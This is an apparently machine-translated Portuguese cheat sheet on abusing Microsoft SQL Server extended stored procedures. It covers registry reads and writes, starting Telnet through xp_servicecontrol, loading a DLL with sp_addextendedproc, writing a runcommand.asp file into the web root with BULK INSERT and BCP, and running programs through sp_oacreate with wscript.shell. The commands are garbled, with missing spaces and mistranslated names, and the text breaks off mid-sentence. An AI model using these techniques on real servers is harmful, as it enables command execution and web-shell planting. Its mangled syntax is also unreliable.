Algumas extensões SQL
xp_regaddmultistring
XP_REGDELETEKEKY DELETE NOME
XP_REGDELETEVALATE Valor da chave
xp_regenumkeys enum
xp_regenumValues
xp_regread for
XP_REGREMOVEMULTISTRAÇÃO
xp_regwrite gravação
xp_availablemedia View Drive
XP_DIRRTREE View Directory
XP_ENUMDSNODBC Fonte de dados
XP_LOGINCONFIG Informações sobre algumas configurações de segurança do servidor
pacote xp_makecab, algumas permissões DBO podem ser usadas primeiro
XP_NTSEC_ENUMDOMINAS ENUM NOME DOMAION Informações relacionadas
XP_Terminate_process Terminal Process e IP
XP_LOGININFO Atualmente, conta de login
sp_configure recupera o conteúdo no banco de dados (acho que isso é bastante útil)
SP_HELPEXTENDEDPROC Obtém todas as extensões de armazenamento
SP_WHO2 Consulta usuários, o host que eles fazem login, as operações que executam no banco de dados, etc.
Algumas informações de rede
Execxp_regreadhkey_local_machine,
'System/CurrentControlSet/Services/Lanmanserver/Parâmetros',
'NullSessionShares'
SNMP assistido pelo escrutínio de rede
Execxp_regenumvalueshkey_local_machine,
'System/CurrentControlSet/Services/SNMP/Parameters/ValidComm
Unidades
Inicie alguns serviços do sistema, como a Telnet, e você pode ir para Admin ou algumas senhas do sistema.
ExecMaster..XP_SERVICECONTROL'START ',' SCROQUIFICADO '
ExecMaster..XP_SERVICECONTROL'START ',' servidor '
Sp_addetenpedproc'xp_webserver ',' c: /temp/xp_foo.dll 'Esta extensão pode executar o programa
Use a sintaxe 'Bulkinsert' para inserir um arquivo de texto em uma tabela temporária. Basta criar esta tabela:
CreateTableFoo (Linevarchar (8000))
Em seguida, execute a operação do Bulkinsert para inserir os dados no arquivo na tabela, como:
BulkinsertFoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT*FromText..foo" Queryoutc: /inetpub/wwwroot/runcommand.asp-c-slocalhost-usa-pfoobar
O parâmetro 'S' é o servidor que executa a consulta, o parâmetro 'u' é o nome do usuário, o parâmetro 'P' é a senha, aqui está 'Foobar'
Vários procedimentos armazenados embutidos são fornecidos no SQLServer que permitem a criação de scripts automáticos do ActiveX. Esses scripts são os mesmos que os scripts executados no interprecador de scripts do Windows ou em programas de script ASP - eles usam o VBScript ou JavaScript para criar e interagir com eles. Um script de execução automático usando esse método pode fazer qualquer coisa no Transact-SQL em scripts ASP ou em scripts WSH.
Use o objeto 'wscript.shell' para criar uma instância do bloco de notas:
Declare@oint
execsp_oacreate'wscript.shell ',@oout
Execsp_oamethod@o, 'run', null, 'notepad.exe'
Especifique para executá -lo após o nome de usuário: